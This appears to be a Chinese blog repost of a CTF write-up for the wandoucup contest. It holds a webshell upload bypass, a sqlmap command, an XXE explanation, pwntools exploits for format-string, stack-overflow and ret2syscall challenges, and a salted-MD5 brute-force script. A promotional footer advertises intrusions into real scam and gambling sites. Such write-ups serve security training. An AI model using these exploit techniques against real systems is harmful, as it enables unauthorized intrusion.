分享

豌豆杯-CTF(CTF实战篇,适合赛前学习)

 zZ华 2023-06-16 发布于广东

目录

前几年的豌豆杯CTF,适合CTF实战训练

wandoucup-ctf

网络协议分析1-数据包里有甜甜圈哦~

网络协议分析2-嘿嘿嘿(未解出)

网络协议分析3-thief

Misc1-会飞的狗狗

Misc2-文件类型分析

Misc3-真真假假分不清楚

Misc4-诱人的音乐

Misc5-神秘的文件名(未解出)

Crypto1-我这密码忘了。。。

Crypto2-二战时期的密码

Crypto3-被黑了,求密码

Crypto4-出航了~出航啦!!

Crypto5-IDC密码破解(未解出)

pwn1--格式化字符串漏洞

pwn2--栈溢出

pwn3--ret2syscall

web1-签到题

web2-输入密码查看flag

web3-这真能传马?

web4-这真能注入?

web5-API

web6-sweet home

web附加题-atom

web

Pwn

Crypto

Misc

网络协议分析

wandoucup-ctf

这两天在打一个稍微简单的CTF,写个writeup记录一下被虐的过程?,总的来说这场小赛是个大杂烩,毕竟你懂的?,作为做题者我们当然是有题做就ok的。

由于比赛后环境关闭,所以有的无图片展示,现有的图片是下午就准备写writeup截的图。

web

web1-签到题

题目链接

跟某几个ctf练习平台上面的滑稽题一样:

图片

一键获取flag?。

web2-输入密码查看flag

题目链接

简单浏览一下,就是一个爆破的题:

图片

密码为五位数,那我们直接上burpsuite咯:设置长度和payload字符:

图片

图片

GET FLAG!

web3-这真能传马?

题目链接

简单地抓包修改参数,从而使得自己能够传php,我直接上了一个大马,然后看/opt/flag.txt。

图片

抓包可以看到url中的ext参数传递的是文件类型,猜测是可以修改,我们加个php到中间即可成功地直接上传webshell(很抠脚)。

图片

然后再修改一下content-type即可:

图片

To /opt/flag.txt get flag==>?

图片

web4-这真能注入?

题目链接

浏览一下,加个单引号试试就一个很明显的注入咯:

图片

直接sqlmap注入即可,sqlmap -u http://101.231.137.47:20004/php/index.php?gid=1 --dbs

得到数据库名后直接逐步指定数据库表,指定字段,dump即可。

由于比赛后服务已经关闭故未能截取成功图片。

web5-API

这题是xxe外部实体注入,通过抓包,修改POST数据以及Content-type从而读取到/tmp/flag.txt。

XXE漏洞就是服务器接受从客户端发送来的xml格式数据时,xml数据中恶意的引用了外部实体,将它的值绑定为服务器的目标文件,这样在服务器返回给我们解析后的值时,就会把目标文件的内容返回给我们,从而读取敏感文件内容。

题目原本传输的Content-type: application/json改为Content-type: application/xml,并将POST的数据改为以下xml代码:

]>

&xxe;

然后发送数据包,就可得到api返回的flag了。

web6-sweet home

这道题有点东西,一步一步深入,到最后一个提示放出之后几分钟,迅速拿到flag。

步骤:登录和注册界面需要写脚本抛出对应规则的code,然后通过目录遍历得到部分页面源码以及一个目录(分别是user.php~, config.php~,adminpic),根据源码可以得知adminpic是admin用户上传文件的一个目录,并且我们可以得到数据库账号密码,全端口扫描得到23306端口为数据库服务端口,登陆后得到admin账户密码,经过大半天的破解md5之后,得到提示crypto.html,这是一个指定的解密md5的页面,输入admin密码hash值破解得到提示crypto.png,访问得到二维码,扫描即可获得密码wandouxueyuan:),用此密码可登录admin账户,来到上传图片publish页面,结合前面遍历得到的一个adminpic目录可以知道上传文件在此目录中,经过简单的绕过后上传大马即可。

傻傻的我还尝试文件包含,session_decode,以及register注册等等操作。

图片

传完马后访问/adminpic目录即可看到自己上传的文件,从而getshell拿到flag:

图片

web附加题-atom

这道web加餐题,实际上就是用给的账户密码登录后将cookie中的admin=0改为admin=1,然后会跳转到一个后台,然后查看后台源码即可得到真正的flag。

Pwn

三个pwn都非常经典,分别考察格式化字符串漏洞,简单的溢出,以及ret2sys几个知识点。

pwn1--格式化字符串漏洞

通过用IDA简单地分析一下逻辑,可以看到printf处存在格式化字符串漏洞:#vuln_fun函数伪c代码

int __cdecl main(int argc, const char **argv, const char **envp)

{int v4; // [esp-Ch] [ebp-7Ch]int v5; // [esp-8h] [ebp-78h]int v6; // [esp-4h] [ebp-74h]int format; // [esp+0h] [ebp-70h]int v8; // [esp+4h] [ebp-6Ch]int v9; // [esp+8h] [ebp-68h]int v10; // [esp+Ch] [ebp-64h]int v11; // [esp+10h] [ebp-60h]int v12; // [esp+14h] [ebp-5Ch]int v13; // [esp+18h] [ebp-58h]int v14; // [esp+1Ch] [ebp-54h]int v15; // [esp+20h] [ebp-50h]int v16; // [esp+24h] [ebp-4Ch]int v17; // [esp+28h] [ebp-48h]int v18; // [esp+2Ch] [ebp-44h]int v19; // [esp+30h] [ebp-40h]int v20; // [esp+34h] [ebp-3Ch]int v21; // [esp+38h] [ebp-38h]int v22; // [esp+3Ch] [ebp-34h]int v23; // [esp+40h] [ebp-30h]int v24; // [esp+44h] [ebp-2Ch]int v25; // [esp+48h] [ebp-28h]int v26; // [esp+4Ch] [ebp-24h]int v27; // [esp+50h] [ebp-20h]int v28; // [esp+54h] [ebp-1Ch]int v29; // [esp+58h] [ebp-18h]unsigned int v30; // [esp+64h] [ebp-Ch]int *v31; // [esp+6Ch] [ebp-4h]v31 = &argc;v30 = __readgsdword(0x14u);memset(&format, 0, 0x64u);__isoc99_scanf(0,(int)&format,(int)'%s',(int)&format,v4,v5,v6,format,v8,v9,v10,v11,v12,v13,v14,v15,v16,v17,v18,v19,v20,v21,v22,v23,v24,v25,v26,v27,v28,v29);printf((const char *)&format); //格式化字符串漏洞fflush(_bss_start); //覆盖got表中fflush条目指向的地址,将其指向read_flag函数return 0;

}

简单运行一下,我们可以构造语句:aaaa-%p-%p-%p-%p-%p-%p-%p-%p,然后输入得到:

图片

可以看到我们的输入被放在了printf函数栈中的第6个位置(这里的%p是c/c++中格式化字符串的参数),格式化字符串漏洞最主要的危害就是可以获取任意地址内容,或者实现任意地址写,那么我们这就是通过任意地址写,来覆盖got表,之前的练习记录中就提到了这些知识。

既然知道了利用位置,那么直接利用pwntools构造exp:

#coding:utf-8from pwn import *context.log_level = 'debug'#io = process('./200')

elf = ELF('./200')

io = remote('101.231.137.47','20010')

#read_flag_addr = 0x0804859B

read_flag_addr = elf.sym['read_flag']#bss_addr = 0x0804A034

got_printf_addr = 0x0804A00c

got_fflush_addr = 0x0804A010#覆盖fflush地址指向的内容,从而实现read_flag跳转

payload = fmtstr_payload(6, {got_fflush_addr: 0x0804859B}) io.sendline(payload)

io.interactive()

exp效果:

图片

pwn2--栈溢出

简单的栈溢出啦,很常见的,找到溢出点然后把EIP指向我们的win函数地址即可:

图片

通过gdb-peda,pattern模块,找到溢出偏移量为76,也就是说只需要构造76*'a' + win_addr即可:

图片

构造exp:#coding:utf-8from pwn import *context.log_level = 'debug'#ida中有win函数的地址

win_addr = 0x08048488

#io = process('101.231.137.47',20011)

io = process('./100')

payload = 76*'a' + p32(win_addr)io.send(payload)

io.interactive()

io.close()

运行效果(因为环境已经关闭,所以只能展示本地效果):

图片

pwn3--ret2syscall

pwn3的话稍微比上面两题要难上一点点,不过还在我这个萌新的承受范围之内,先检查一下保护措施:

图片

可以看到只是开了栈不可执行 (NX),静态分析一波:

图片

这里我们也可以看到一个win_func函数,猜测同样是利用返回到该函数从而得到flag,那么如何返回到这个win_func函数呢?

我们注意到mem_test函数伪c代码如下:

图片

直接return result,那么如果有溢出存在,那我们能不能覆盖掉这个函数的返回地址呢,那当然是可行的(这题不能直接用pattern create得到偏移量,如果pattern过大则会导致无法覆盖eip),用gdb在mem_test函数下断点调试:

图片

然后根据之前ida分析变量s的位置为ebp-0x13,我们可以知道,ebp = 0xffffd145 +0x13 = 0xffffd158,或者直接在gdb看ebp的值,可以知道0x8048718就是return返回的地址。我们需要将它覆盖成win_func的地址。

图片

而catflag地址就是一开始输出的那个hint:0x080487E0

构造exp:

#coding:utf-8

Author = 'Yof3ng'from pwn import *

import sys

context.binary = './memory'

context.log_level = 'debug'

elf = context.binary

#io = process('./memory')

io = remote('101.231.137.47','20012')

catflag = 0x080487E0

system_addr = elf.sym['win_func']

print(system_addr)

#padding由栈空间和ebp(0x13+4)组成,system('cat flag')由system函数和catflag参数以及system返回地址组成

payload = flat(cyclic(0x17), system_addr, 0x08048677, catflag)

print(payload)

io.sendline(payload)io.interactive()

运行效果:

图片

Crypto

Crypto1-我这密码忘了。。。

题面有一串base64:VTBzNE9GZEhURWhDVjBveFVrMVVTell4UkRKWU5FTTFRMGszUmtrd1ZFVT0=

连续解码即可得到:SK88WGLHBWJ1RMTK61D2X4C5CI7FI0TE

提交即可。

Crypto2-二战时期的密码

据说是某平台原题,甚至专门去查了一下二战时期的密码学,题面:已知将一个flag以一种加密形式为使用密钥进行加密,使用密钥WELCOMETOCFF加密后密文为000000000000000000000000000000000000000000000000000101110000110001000000101000000001,请分析出flag

WELCOMETOCFF为密钥,长度为12,而二进制串长度为84,既然密文为二进制,那么可以想到的比较简单的加密操作就是按位与,按位或,以及按位异或。

尝试后发现是异或操作,将WELCOMETOCFF,分别用七位二进制表示其在字母表中的顺序,并且每对应的七位进行异或操作:

密文0000000 0000000 0000000 0000000 0000000 0000000 0000000 0010111 0000110 0010000 0010100 0000001XOR密钥

W E L C O M E T O C F F

0010111 0000101 0001100 0000011 0001111 0001101 0000101 0010100 0001111 0000011 0000110 0000110得到:

0010111 0000101 0001100 0000011 0001111 0001101 0000101 0000011 0001001 0010011 0010010 0000111

W E L C O M E C I S R G==> flag{WELCOMECISRG}

提交即可。

Crypto3-被黑了,求密码

摩斯电码解码即可:

图片

flag:JRQ058XMGC1I7PB4UNGA7BLNBCMS6YJ0

Crypto4-出航了~出航啦!!

根据题面,尝试进行对请求类型进行过滤,发现POST请求只有一个,并且有userid和pswrd:

图片

尝试将pswrd的值解码后提交flag,成功。

Crypto5-IDC密码破解(未解出)

给出一串字符js4163633181327481

完全脑洞题:手机九键4163633181327481,没用过的咋活。。。

### Crypto6-超级密码

这题给出了大量的md5值,以及类似于base64格式的字符串,很容易就想到hash加盐(salt)的问题,而且隐约记得之前在哪看到过这个题。

脚本爆破(时间原因,直接从1234567880开始):# coding:utf-8

import hashlib

from numba import jit

@jit

def run():password =['f09ebdb2bb9f5eb4fbd12aad96e1e929.p5Zg6LtD','6cea25448314ddb70d98708553fc0928.ZwbWnG0j','2629906b029983a7c524114c2dd9cc36.1JE25XOn','2e854eb55586dc58e6758cfed62dd865.ICKTxe5j','7b073411ee21fcaf177972c1a644f403.0wdRCo1W','6795d1be7c63f30935273d9eb32c73e3.EuMN5GaH','d10f5340214309e3cfc00bbc7a2fa718.aOrND9AB','8e0dc02301debcc965ee04c7f5b5188b.uQg6JMcx','4fec71840818d02f0603440466a892c9.XY5QnHmU','ee8f46142f3b5d973a01079f7b47e81c.zMVNlHOr','e4d9e1e85f3880aedb7264054acd1896.TqRhn1Yp','0fd046d8ecddefc66203f6539cac486b.AR5lI2He','f6326f02adaa31a66ed06ceab2948d01.Aax2fIPl','720ba10d446a337d79f1da8926835a49.ZAOYDPR2','06af8bcc454229fe5ca09567a9071e62.hvcECKYs','79f58ca7a81ae2775c2c2b73beff8644.TgFacoR3','46aaa5a7fef5e250a2448a8d1257e9cf.GLYu0NO4','2149ac87790dd0fe1b43f40d527e425a.5Xk2O1sG','d15a36d8be574ac8fe64689c728c268e.aZikhUEy','ff7bced91bd9067834e3ad14cc1464cd.E7UROqXn','8cc0437187caf10e5eda345cb6296252.XPin3mVB','5cfcdca4a9cb2985a0b688406617689e.nsGqoafv','5a7dfa8bc7b5dfbb914c0a78ab2760c6.YC1qZUFR','8061d8f222167fcc66569f6261ddd3cc.wNgQi615','3d8a02528c949df7405f0b48afe4a626.CO2NMusb','70651acbc8bd027529bbcccdbf3b0f14.CAXVjFMd','a9dbe70e83596f2d9210970236bdd535.TL6sjEuK','9ed6ef5780f705ade6845b9ef349eb8f.tJ90ibsz','4b46fac0c41b0c6244523612a6c7ac4a.VTjOSNmw','8141e6ecb4f803426d1db8fbeb5686ef.lh75cdNC','df803949fd13f5f7d7dd8457a673104b.V39sEvYX','19052cc5ef69f90094753c2b3bbcd41d.YwoGExpg','cf8591bdccfaa0cdca652f1d31dbd70f.pJCLui49','66e10e3d4a788c335282f42b92c760a1.NQCZoIhj','94c3ae5bcc04c38053106916f9b99bda.vOktelLQ','e67e88646758e465697c15b1ef164a8d.x0hwJGHj','84d3d828e1a0c14b5b095bedc23269fb.2HVWe9fM','264a9e831c3401c38021ba3844479c3f.Cx4og6IW','ed0343dec184d9d2c30a9b9c1c308356.g2rqmPkT','ad5ba8dc801c37037350578630783d80.pFK2JDT5','3f588bedb704da9448e68fe81e42bca6.4ANDOiau','970c9cf3cad3dfa7926f53ccaae89421.R6ML7Qy8','e0a097b7cceaa7a8949fe039884e4a2d.dul2ynqL','7df505218102c64b1fe4fa5981ddb6fa.jPeoyS57','fd4f6043da1f7d5dca993c946ef6cd7c.6p9CwGaY','5fe6d99b9a2824949279187c246c9c30.OGQ2J57y','135b150ad513a961089bb1c05085a3d9.h0dw1Fro','ad6af4fb623b3c51181a371911667fed.HbQT4dRz','c9fa4b0db317d88e2b10060225e92494.ebVnpMzS','d0deab17d115bd6fdce8592bb3667643.bL5zwgvX','006f0cb3a422716692f143f28eb0d187.NHXg1Fof','ddc125de34da1a6ec0cbe401f147bc8f.GDai9Y0n','be5052053c5a806e8f56ed64e0d67821.40alyH3w','aaf18ac446b8c385c4112c10ae87e7dc.ZJQzuIL0','a2db20a4b7386dc2d8c30bf9a05ceef7.QnpOlPWH','8a4fbc32a3251bb51072d51969ba5d33.rtcbipeq','5e35d2c9675ed811880cea01f268e00f.i1Hbne6h','9da23007699e832f4e9344057c5e0bd3.EtbGpMSW','f09233683d05171420f963fc92764e84.fxHoinEe','4feabf309c5872f3cca7295b3577f2a8.KymkJXqA','9b94da2fa9402a3fdb4ff15b9f3ba4d2.G3Tdr1Pg','b3cd8d6b53702d733ba515dec1d770c5.Y71LJWZz','6a5b3b2526bb7e94209c487585034534.rIwb4oxt','e9728ef776144c25ba0155a0faab2526.e1sOXSb8','d41a5e7a98e28d76dbd183df7e3bcb49.36bedvia','81d5ebfea6aff129cf515d4e0e5f8360.dDG4qTjW']n=1234567880while(n<10000000000):for j in range(0,66):salt = password[j][33:]md5 = password[j][:32]mingwen = '{FLAG:'+str(n)+'}'+password[j][33:]miwen = hashlib.md5(mingwen.encode('utf-8')).hexdigest()if (miwen == md5) :print(mingwen)print(password[j])n=10000000000breakprint(n)n=n+1run()

运行效果:

图片

flag:1234567890

Misc

Misc1-会飞的狗狗

图片

直接查看文件内容可以得到末尾的base64字符串,接解码得到flag

图片

Misc2-文件类型分析

得到一个zip压缩包,点开来看看,存在[content-types].xml文件,基本上可以确定是微软公司office套件的格式。简单试过doc,docx,ppt,pptx,xls,xlxs没用之后,查到xps:

图片

于是改为xps文件后缀即可,将xps提交。

Misc3-真真假假分不清楚

简单的一个伪加密,修改全局加密标志位,将奇数改为偶数即可。

{FLAG:011938d495c36aeab4bfbd897c240d31}

Misc4-诱人的音乐

这题的音频文件中存在一段摩斯电码(有的同学通过二进制getflag),通过音频分析软件可以将其提取出来:

.--..--..--.--...--....-.--..---.----.--.--...--.--.-.....--...-.---.....---.-...---.-.-.--.---..--..-.-.-.-----..--.-.-..--..--.---.--..--..-.-.---..-..-----.-#一次性解码行不通,可以将其分为三段分别解码并且将三个非正常字符转为16进制:

.--..--..--.--...--....-.--..---.----.--.--...--.--.-...

晬61677b6368

晬 ==> 0x666c

..--...-.---.....---.-...---.-.-.--.---..--..-.-

ㅰ74756e65

ㅰ ==> 0x3170

.-.-----..--.-.-..--..--.---.--..--..-.-.---..-..-----.-

張337665727c

張 ==> 0x5f35#进行拼接

666c61677b6368317074756e655f35337665727c

#可以得到

flag{ch1ptune_53ver|

#提交ch1ptune_53ver即可

Misc5-神秘的文件名(未解出)

可以通过binwalk得到一个逆向题,较难,未解出。

网络协议分析

网络协议分析1-数据包里有甜甜圈哦~

wireshark打开数据包后,依次使用以下过滤规则:

http contains flag

tcp contains flag

udp contains flag

即可通过udp contains flag查到flag。

图片

网络协议分析2-嘿嘿嘿(未解出)

经过疯狂手动提取后发现只能获得一丝图片,赛后得知需要用tcpflow这个神器重构损害的tcp数据,从而得到图像。

网络协议分析3-thief

拿到数据包打开后发现大部分都是802.11 wlan数据包,过滤一下http请求:

图片

可以发现第一个请求的是/rom-0,确实不知为何就觉得这个是关键,google搜索一下:

图片

点进routerPwn发现是一个解压rom-0文件的网址,那我们是不是还缺一个文件。接下来通过导出http对象,我们可以得到一个rom0文件,正好将其解密得到以下内容:#猜测是用来解密的密钥咯

Rome4040

TP-LINK

public

public

public

public

在运用wireshark分析流量的过程中我们经常需要使用密钥之类的东西来解密流量,此处同样通过 查询资料 可以获得解密方式:

图片

将密码Rome4040导入解密,可以发现的确出现了很多http和tcp的包,根据题目提示使用过滤http contains CTF得到flag:

图片

?wandoucup-CTF-WP到此结束。

Publish by Yof3ng?。

转载于:https://www.cnblogs.com/yof3ng/p/9870270.html

http://www./news/show-263302.html?action=onClick

【Hacking黑白红】,一线渗透攻防实战交流公众号

回复“电子书”获取web渗透、CTF电子书:

回复“视频教程”获取渗透测试视频教程;  

回复“内网书籍”获取内网学习书籍;        

回复“CTF工具”获取渗透、CTF全套工具;

回复“内网渗透”;获取内网渗透资料;

回复“护网”;获取护网学习资料 ;

回复“python”,获取python视频教程;

回复“java”,获取Java视频教程;

回复“go”,获取go视频教程

知识星球

【Hacking藏经阁】知识星球致力于分享技术和认知。

1、技术方面。主攻渗透测试(web和内网)、CTF比赛、逆向、护网行动等;

400G渗透教学视频、80多本安全类电子书、50个渗透靶场(资料主要来自本人总结、以及学习过程中购买的课程)

2、认知方面。副业经营、人设IP打造,具体点公众号运营、抖*yin等自媒体运营(目前主要在运营两个平台4个号)。

如果你也想像我一样,不想35岁以后被动的去面试,那么加入星球我们一起成长。

欢迎加入99米/年,平均每天2毛7分钱,学习网络安全一整年。

渗透实战系列

▶【渗透实战系列】51|- 一次BC站点的GetShell过程

▶【渗透实战系列】50|- Log4j打点后与管理员斗智斗勇

▶【渗透实战系列】49|-实战某高校的一次挖矿病毒的应急处置

▶【渗透实战系列】|48-一次内网渗透

▶【渗透实战系列】|47-记一次对某鱼骗子卖家的溯源

▶【渗透实战系列】|46-渗透测试:从Web到内网

▶【渗透实战系列】|45-记一次渗透实战-代码审计到getshell

▶【渗透实战系列】|44-记一次授权渗透实战(过程曲折,Java getshell)

▶【渗透实战系列】|43-某次通用型漏洞挖掘思路分享

▶【渗透实战系列】|42-防范诈骗,记一次帮助粉丝渗透黑入某盘诈骗的实战

▶【渗透实战系列】|41-记一次色*情app渗透测试

▶【渗透实战系列】|40-APP渗透测试步骤(环境、代理、抓包挖洞)

▶【渗透实战系列】|39-BC渗透的常见切入点(总结)

▶【渗透实战系列】|38-对某色情直播渗透

▶【渗透实战系列】|37-6年级小学生把学校的网站给搞了!

▶【渗透实战系列】|36-一次bc推广渗透实战

▶【渗透实战系列】|35-旁站信息泄露的dedecms站点渗透

▶【渗透实战系列】|34-如何用渗透思路分析网贷诈骗链

▶【渗透实战系列】|33-App渗透 ,由sql注入、绕过人脸识别、成功登录APP

▶【渗透实战系列】|32-FOFA寻找漏洞,绕过杀软拿下目标站

▶【渗透实战系列】|31-记一次对学校的渗透测试

▶【渗透实战系列】|30-从SQL注入渗透内网(渗透的本质就是信息搜集)

▶【渗透实战系列】|29-实战|对某勒索APP的Getshell

▶【渗透实战系列】|28-我是如何拿下BC站的服务器

▶【渗透实战系列】|27-对钓鱼诈骗网站的渗透测试(成功获取管理员真实IP)

▶【渗透实战系列】|26一记某cms审计过程(步骤详细)

▶【渗透实战系列】|25一次从 APP 逆向到 Getshell 的过程

▶【渗透实战系列】|24-针对CMS的SQL注入漏洞的代码审计思路和方法

▶【渗透实战系列】|23-某菠菜网站渗透实战

▶【渗透实战系列】|22-渗透系列之打击彩票站

▶【渗透实战系列】|21一次理财杀猪盘渗透测试案例

▶【渗透实战系列】|20-渗透直播网站

▶【渗透实战系列】|19-杀猪盘渗透测试

▶【渗透实战系列】|18-手动拿学校站点 得到上万人的信息(漏洞已提交)

▶【渗透实战系列】|17-巧用fofa对目标网站进行getshell

▶【渗透实战系列】|16-裸聊APP渗透测试

▶【渗透实战系列】|15-博彩网站(APP)渗透的常见切入点

▶【渗透实战系列】|14-对诈骗(杀猪盘)网站的渗透测试

▶【渗透实战系列】|13-waf绕过拿下赌博网站

▶【渗透实战系列】|12 -渗透实战, 被骗4000花呗背后的骗局

▶【渗透实战系列】|11 - 赌博站人人得而诛之

▶【渗透实战系列】|10 - 记某色X商城支付逻辑漏洞的白嫖(修改价格提交订单)

▶【渗透实战系列】|9-对境外网站开展的一次web渗透测试(非常详细,适合打战练手)

▶【渗透实战系列】|8-记一次渗透测试从XSS到Getshell过程(详细到无语)

▶【渗透实战系列】|7-记一次理财杀猪盘渗透测试案例

▶【渗透实战系列】|6- BC杀猪盘渗透一条龙

▶【渗透实战系列】|5-记一次内衣网站渗透测试

▶【渗透实战系列】|4-看我如何拿下BC站的服务器

▶【渗透实战系列】|3-一次简单的渗透

▶【渗透实战系列】|2-记一次后门爆破到提权实战案例

▶【渗透实战系列】|1一次对跨境赌博类APP的渗透实战(getshell并获得全部数据)

图片

长按-识别-关注

Hacking黑白红一个专注信息安全技术的学习平台

图片

点分享

图片

点收藏

图片

点点赞

图片

点在看

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多